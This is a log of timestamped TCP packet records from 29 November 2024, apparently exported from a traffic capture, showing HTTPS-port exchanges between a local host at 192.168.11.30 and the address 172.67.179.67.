                                                                                                            Nov 29, 2024 09:10:29.418601036 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.418687105 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.418832064 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.418832064 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.418972015 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.419023037 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.419248104 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.421164036 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.421248913 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.421396971 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.421396971 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.421459913 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.421591997 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.421741009 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.424109936 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.424199104 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.424340010 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.424340963 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.424406052 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.424442053 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.424659014 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.425409079 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.425606966 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.425652981 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.425653934 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.425653934 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.425719023 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.425942898 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.607223988 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.607254028 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.607465982 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.607620001 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.607636929 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.607937098 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.610157967 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.610184908 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.610343933 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.610343933 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.610363007 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.610443115 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.610457897 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.612905025 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.612934113 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.613066912 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.613082886 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.613092899 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.613094091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.613162994 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.613162994 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.613240957 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.616055012 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.616079092 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.616225958 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.616595984 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.616602898 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.617260933 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.617532015 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.617547989 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.620368004 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.620393991 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.620575905 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.620575905 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.620593071 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.620605946 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.620605946 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.620676994 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.627331972 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.627434969 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.627527952 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.627557993 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.627635956 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.627654076 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.627721071 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.627753973 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.627891064 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.627908945 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.628025055 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.628177881 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.630548954 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.630575895 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.630744934 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.630744934 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.630840063 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.630860090 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.631006002 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.633084059 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.633219957 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.633328915 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.633343935 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.633356094 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.633404016 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.636291981 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.636308908 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.636425972 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.636439085 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.636493921 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.636493921 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.636620045 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.639050961 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.639161110 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.639280081 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.639364958 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.639378071 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.641777039 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.641791105 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.642011881 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.642025948 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.642141104 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.642503023 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.644473076 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.644486904 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.644613028 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.644613028 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.644660950 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.644660950 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.644668102 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.644709110 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.644809961 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.647684097 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.647700071 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.647897959 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.647908926 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.647969961 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.648072958 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.650352001 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.650365114 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.650639057 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.650639057 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.650651932 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.653280020 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.653295040 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.653686047 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.653697014 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.655873060 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.655884981 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.656455040 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.656455040 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.656455040 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.656470060 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.656483889 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.656559944 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.656559944 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.657540083 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.657776117 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.657788038 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.657818079 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.701364040 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.838140011 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.838154078 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.838332891 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.838486910 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.838494062 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.838766098 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.840873003 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.840883970 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.841070890 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.841121912 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.841121912 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.841130018 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.841237068 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.841303110 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.843688011 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.843699932 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.843861103 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.844039917 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.844046116 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.844219923 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.846333027 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.846343040 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.846529961 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.846529961 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.846576929 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.846576929 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.846584082 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.846702099 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.846790075 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.848877907 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.849013090 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.849040985 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.849096060 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.849100113 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.849277020 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.851736069 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.851747990 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.851941109 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.852096081 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.852108002 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.852355003 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.854368925 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.854381084 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.854569912 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.854569912 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.854619026 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.854619026 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.854625940 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.854715109 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.854790926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.857557058 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.857568026 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.857738018 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.857896090 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.857903004 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.858067989 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.860358953 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.860368967 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.860498905 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.860547066 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.860547066 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.860553026 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.860677958 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.860743046 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.863054991 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.863065004 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.863228083 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.863228083 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.863292933 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.863292933 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.863298893 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.863310099 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.863512039 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.865709066 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.865719080 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.865899086 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.865899086 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.865907907 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.865952015 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.865999937 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.866091967 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.868915081 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.868925095 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.869165897 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.869165897 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.869175911 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.869312048 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.871810913 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.871820927 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.871979952 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.872117043 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.872123957 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.872345924 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.874572992 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.874583960 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.874710083 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.874763012 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.874763012 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.874768972 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.874814034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.874908924 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.877760887 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.877770901 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.877953053 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.878004074 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.878004074 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.878012896 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.878022909 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.878176928 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.880589962 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.880599976 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.880795002 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.880795002 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.880803108 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.880845070 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.880966902 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.883400917 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.883410931 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.883589983 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.883589983 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.883642912 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.883649111 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.883658886 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.883658886 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.883797884 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.885868073 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.885878086 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.886059999 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.886068106 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.886110067 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.886110067 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.886250019 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.889215946 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.889226913 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.889364958 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.889411926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.889491081 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.889491081 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.889491081 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.889498949 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.889733076 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.891977072 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.891988039 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.892163038 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.892342091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.892347097 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.892512083 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.894536972 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.894547939 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.894726038 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.894726038 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.894783020 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.894783020 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.894789934 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.894799948 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.895021915 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.897989988 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.898009062 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.898190975 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.898240089 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.898240089 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.898246050 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.898345947 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.898451090 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.900728941 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.900748014 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.900911093 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.900911093 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.900916100 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.901083946 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:29.903330088 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:29.903348923 CET44349761172.67.179.67192.168.11.30
